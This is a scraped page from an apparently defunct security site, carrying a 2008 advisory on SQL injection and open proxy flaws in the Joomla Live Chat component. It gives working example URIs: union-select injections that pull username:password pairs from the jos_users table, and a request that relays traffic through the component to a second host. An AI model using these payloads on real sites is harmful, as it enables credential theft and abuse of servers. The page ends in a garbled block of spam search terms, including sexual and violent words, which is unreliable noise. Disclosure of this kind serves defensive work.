about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Joomla Live Chat Multiple SQL Injection and Open Proxy Vulnerabilities


Title Joomla Live Chat Multiple SQL Injection and Open Proxy Vulnerabilities
Published 2008-12-12-12:00AM
Updated 2008-12-15-08:51PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  jdc
Vulnerable  Joompolitan Joomla Live Chat 0
Not Vulnerable  
Code  Attackers can use a browser to exploit these issues.The following example URIs and exploit are available:http://www.example.comadministrator/components/com_livechat/getChat.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3,4%20from%20jos_usershttp://www.example.com/administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3%20from%20jos_usershttp://www.example.com/administrator/components/com_livechat/xmlhttp.php?GET$01$2$3$4$5$http://www.example2.com
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Wed, 09 Dec 2009 16:30:05 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
boy fuck s narutox sendmail www.wabtri CMS is Fre 200 /compo get /galle php-nuke 2 news for c www.bvtour www.bvtour news for c www.aus888 www.snb365 J...om/id. 200 /compo iizivukabe http://www narutox Apache CGI www.bvtour www.bvtour Xxxvidio grayvee.co Www.doodhw /search/ex www.mqdm.n Sax images www rape m Thrishasex www.mqdm.n Sow www.tlmm12 news for c www.12345. apache 2.0 marrakech www.weiai. vulnerabil openSSH_4. www.dldvb. Xxxmuve www.teaxxg Tampilkan www.xl-dat xt:Commerc news for c php-nuke 2 www.xmhbzx SQL%20Inje